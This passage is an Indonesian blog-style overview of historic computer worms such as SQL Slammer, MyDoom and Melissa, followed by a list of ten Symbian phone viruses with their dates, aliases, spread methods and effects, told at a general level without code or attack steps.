Pada akhir Januari 2003, virus web server yang baru tersebar di Internet. Banyak jaringan komputer tidak siap menghadapi serangan itu, dan sebagai hasilnya virus tersebut merusak beberapa sistem penting. Bank of Amerika layanan ATM mengalami gangguan, kota Seattle mengalami gangguan di layanan 911 dan Continental Airlines terpaksa membatalkan beberapa penerbangan karena mengalami gangguan pada tiket elektronik dan check-in.
Penyebabnya adalah virus SQL Slammer, yang juga dikenal sebagai Sapphire. Menurut perkiraan, virus ini menyebabkan kergian lebih dari $ 1 milyar sebelum ditemukannya antivirus untuk melawan virus ini. Kemajuan serangan Slammer yang didokumentasikan dengan baik. Hanya beberapa menit setelah menginfeksi server Internet pertama, virus Slammer telah menggandakan jumlah korban setiap beberapa detik. Lima belas menit setelah serangan pertama, virus Slammer menginfeksi hampir setengah dari server yang berfungsi sebagai pilar Internet.
 
MyDoom
Virus MyDoom (atau Novarg) merupakan worm yang dapat membuat backdoor dalam sistem operasi komputer korban. Terdapat dua kali serangan dari virus ini. Yang perta pada dimulai pada 1 Februari 2004 dimulai dengan penolakan layanan (DoS). Serangan kedua, perintah terhadap virus untuk menghentikan distribusi dirinya sendiri yang terjadi pada 12 Februari 2004.  Bahkan setelah virus ini berhenti menyebar, backdoors yang diciptakan selama infeksi awal tetap aktif.

Seperti virus lainnya, MyDoom mencari komputer korban menggunakan e-mail sebagai bagian dari proses replikasi. Dan juga akan mengirim permintaan pencarian kepada mesin pencari dan menggunakan e-mail yang ditemukan dalam hasil pencarian. Akhirnya, mesin pencari seperti Google mulai menerima jutaan permintaan pencarian dari komputer yang telah terinfeksi. Serangan tersebut mengakibatkan melambatnya layanan mesin pencari dan bahkan menyebabkan beberapa crash.
Malevolent Melissa
Virus Melissa membanjiri jaringan perusahaan dengan e-mail pada Maret 1999. Melalui Microsoft Outlook, bila pengguna membuka pesan e-mail yang berisi Word attachment yang terinfeksi, virus itu akan dikirim ke 50 nama pertama dalam buku alamat pengguna. Begitu banyak lalu lintas e-mail yang dihasilkan dengan sangat cepat, sehingga perusahaan seperti Intel dan Microsoft harus mematikan server e-mail mereka. Virus Melissa adalah virus pertama yang mampu melompat dari satu komputer ke komputer lain dengan sendiri.
(Expletive Deleted) Explorer 
worm Explorer.zip ini muncul di musim panas 1999, mengikuti jejak dari Melissa. Worm ini menghapus file Word, Excel, dan PowerPoint dan secara acak diubah menjadi jenis file lainnya. Seperti virus Melissa, virus Explorer berpindah/menyebar melalui e-mail yang tampak dari seseorang yang dikenal. Pesan tersebut mencakup file yang jika diaktifkan, menunjukkan pesan error palsu kepada pengguna. Tidak seperti Melissa, virus ini tidak menggunakan Outlook untuk mengumpulkan alamat e-mail. Sebaliknya, virus ini melihat inbox dari komputer yang terinfeksi dan kemudian mengirim balasan otomatis ke pengirim, menggunakan subyek e-mail yang sama dengan pesan asli.
Surreptitious Sircam

Sircam muncul pada bulan Juli 2001. Worm ini muncul dalam inbox e-mail dengan berisian lampiran. Isi pesan tersebut menggunakan bahasa inggris dan spanyol seperti "Hi! How are you?" dan "Hola como estas?". Jika Anda membuka lampiran tersebut, maka sicram akan terinstal dengan sendirinya di komputer Anda, dan langsung menyerang dan menginfeksi komputer Anda, yang dapat menghapus berbagai file, serta mengisi hard drive Anda dengan file-file sampah.
 

10 Virus Handphone Paling Ganas!

Sama halnya dengan komputer. Handphone juga bisa kena virus. Seperti sebuah program virus, yakni program yang dapat menginstall dirinya sendiri, mereka dapat menyebabkan kerusakan baik secara langsung maupun tidak. Walaupun ada beberapa dari mereka yang tidak menyebabkan kerusakan, tapi mereka tetap menyebabkan kerugian.

Berikut ini daftar 10 Virus Handphone Paling Ganas yang ditemukan :
1. Cabir
Ditemukan: Jun 2004
Nama alias: SymbOS/Cabir.A, EPOC/Cabir.A, Worm.Symbian.Cabir.a, Caribe
Target: Handphone Symbian s60v2
Tersebar melalui: Bluetooth
Kerusakan: memberlambat kinerja handphone
Cabir merupakan worm yang menyebar melalui koneksi Bluetooth dan masuk ke inbox pesan dengan nama yang menarik. Jika file tsb dibuka dan di install, Cabir akan mulai mencari sasaran ponsel lain yang sedang terbuka akses sambungan Bluetooth-nya untuk menyebar. Cabir akan mengaktifkan Bluetooth secara periodik, sekitar 15-20 menit sekali, untuk mendapatkan sasaran handphone lain. Tidak ada kerusakan berbahaya, tetapi baterai hp akan habis lebih cepat karena bluetooth terus menerus digunakan.
2. Skulls
Ditemukan: November 2004
Nama alias: SymbOS.skulls, skulls.sis, Extenhded theme.sis
Target: handphone Symbian
Tersebar melalui: Internet
Kerusakan: handphone tidak bisa digunakan lagi selain untuk menelpon dan menerima panggilan.
Ketika terinstall, Skull H akan menampilkan notification message: “Install beta_092_free-sms-RM8″ dan Skull S menampilkan pesan “Install Blue Num Stealer”, dan beberapa pesan aneh lainnya. Jenis Trojan ini merusak sistem dan menyebabkan menu icon berubah menjadi icon tengkorak. Tidak hanya dapat mengubah icon, Skull dapat merusak semua aplikasi yang icon-nya telah diubah. Biasanya ketika aplikasi yang terinfeksi akan dibuka maka yang akan muncul adalah error message.
3. CommWarrior
Ditemukan: Jan 2005
Nama alias: random
Target: Handphone Symbian s60v2
Tersebar melalui: Bluetooth dan MMS
Kerusakan: Mengirim virus replikasi melalui MMS untuk semua nomor dalam contacs, menghabiskan pulsa.
Virus ini keberadaan nya sering tidak disadari karena nama yang digunakannya tidak tentu. Serangan jenis virus ini sangat bervariasi, tetapi yang paling umum adalah virus akan menyebar melalui Bluetooth. Beberapa varian dari virus ini juga akan mengirim MMS acak ke nomor yang tersimpan di contacs. Varian terakhir yang ditemukan adalah Commwarrior T. yang menulari Symbian 8.1 (s60v2) atau versi sebelumnya. Virus ini akan menyebar dan kadang-kadang membuka halaman HTML berisi pesan seperti ini:
“Introduction Surprise! Your phone infected by CommWarrior worm v3.0. Matrix has you, CommWarrior inside. No panic please, it is very interesting to have mobile virus at own phone. This worm does not bring any harm to your phone and your significant data. About CommWarrior worm for Nokia Series60 provides automatic real-time protection against harmful Anti-Virus content. CommWarrior is free software and is distributed in the hope that it will be useful, without any warranty. Thank you for using CommWarrior. CommWarrior © 2005-2006 by e10d0r.”
4. Locknut
Ditemukan: Mar 2005
Nama alias: unknown
Target: Symbian s60
Tersebar melalui: Internet download
Kerusakan: crashing sistem handphone (ROM)
Locknut atau SymbOS.Locknut adalah Trojan yang menggunakan backdoor dalam sistem Symbian S60. Virus ini berbahaya karena dapat mengubah data binary (file ekstensi .bin) dalam ROM handphone dari sistem, dan menyebabkan sistem operasi handphone berhenti. Locknut E, salah satu varian dari virus ini, akan merusak file-file penting dalam sistem Symbian dan menyebabkan aplikasi yang terinfeksi tidak dapat dibuka. Dengan cara ini, lama-kelamaan handphone akan terkunci secara total.
5. Fontal
Ditemukan: April 2005
Nama alias: unknown
Target: ponsel Symbian s60
Tersebar melalui: Internet download
Kerusakan: Mengunci handphone sejak pertama dinyalakan sehingga tidak dapat digunakan. Jika Locknut mengunci handphone secara bertahap, maka Fontal akan mengunci handphone sejak pertama kali dinyalakan.
6. RommWar
Ditemukan: -
Nama alias: theme.sis, xxx.sis, Britney_.sis, atau nama-nama menarik lainnya yang memancing lo untuk melakukkan instalasi
Target: Symbian s60
Tersebar melalui: bluetooth, MMS, dan internet merusakan: menyebabkan handphone tidak dapat melakukkan booting, sering restart sendiri Bila proses instalasi berjalan, layar akan menampilkan pesan seperti ini: “Install Stoper by WarriorMarrior?” RommWar terdiri dari 4 varian yakni A,B,C dan D yang kesemuanya memiliki fungsi menyebabkan handphone tidak dapat melakukkan booting, sering restart sendiri, mematikan fungsi tombol power, dan mencegah handphone untuk menyala saat dinyalakan.
7. DoomBoot
Ditemukan: -
Nama alias: Doom_2_wad_kracked_by_DFT_S60_v.1.0.sis (menyamar sebagai mobile games Doom 2), exoVirusStopv2.13.19 (menyamar sebagai program antivirus)
Target: symbian s60
Tersebar melalui: bluetooth
Kerusakan: membuat file corrupted, mencegah reboot handphone, jika berhasil reboot maka harus melakukkan hard-reset Doomboot termasuk jenis virus Trojan. Banyak varian yang telah ditemukan, seperti Doomboot A, C, L, F, G, dan P. Doomboot A membuat file corrupted, dan setelah menjangkiti suatu file, ia akan menempatkan virus lain seperti CommWarrior.B ke dalam handphone. File yang rusak akan mencegah handphone untuk menjalankan rebooting. Selain itu, virus ini juga menyebabkan baterai akan cepat habis karena terus menerus menggunakan koneksi bluetooth.
8. CardTrap
Ditemukan: -
Nama alias: menyamar sebagai game terkenal seperti Kingkong, Half Life, Battlefield 2, dll. Terkadang juga menyamar sebagai aplikasi misalnya SeleQ 1.7 – kracked TNT.sis
Target: handphone Symbian s60 dan PC berbasis Windows
Tersebar melalui: memory card
Kerusakan: menyebabkan aplikasi penting menjadi malfungsi, kekacauan sistem, merusak fungsi beberapa tombol Virus handphone pertama yang dibuat untuk juga menyerang komputer berbasis Windows. Ia akan menaruh 2 file virus ke dalam memory card handphone. Banyak varian telah ditemukan, seperti CardTrap P, Q, R, S hingga alphabets ganda seperti CardTrap AA, AG, AJ, dll. Cardtrap merusak sistem dengan mematikan beberapa aplikasi penting, terutama aplikasi antivirus. Jika memory card yang terkena virus ini dihubungkan ke PC, maka CardTrap akan menanam dirinya sendiri ke PC tsb dan menyebarkan diri.
9. PBStealer
Ditemukan: -
Nama alias: ChattingYuk.sis, PBCompressor.sis
Target: handphone Symbian s60
Tersebar melalui: bluetooth
Kerusakan: mengeksploitasi nomor kontak, daftar agenda, database dan notepad PBStealer adalah virus handphone yang berasal dari Indonesia, berbanggalah kita dengan Indonesia… hahaha.
Virus ini akan mengcopy data-data penting di handphone kita semisal contacs, to-do list, notes, dll kedalam format .txt dan kemudian akan disebarkan ke handphone lain semisal bluetooth. Sekilas terlihat tidak berbahaya tapi bagaimana jika ada data penting kita yang disebarkan dan digunakan untuk tujuan kriminal?
10. AppDisabler
Ditemukan: -
Nama alias: -
Target: Symbian
Tersebar melalui: bluetooth, MMS
Kerusakan: menginstall virus-virus lain yang berbahaya sekaligus, seperti Locknut, Cabir serta Skulls, sehingga menyebabkan seluruh sistem operasi terhenti.
Bisa dikatakan, inilah virus handphone paling berbahaya yang pernah ada karena enggabungkan beberapa jenis virus sekaligus.
Nah, sekian info kali ini. Hati-hati buat pengguna handphone yang ber-OS syimbian, andoid, ataupun windows phone, dll. Selalu check apakah handphone anda bersih dari virus dengan cara scan minimal 1 minggu sekali ;)
 
diooda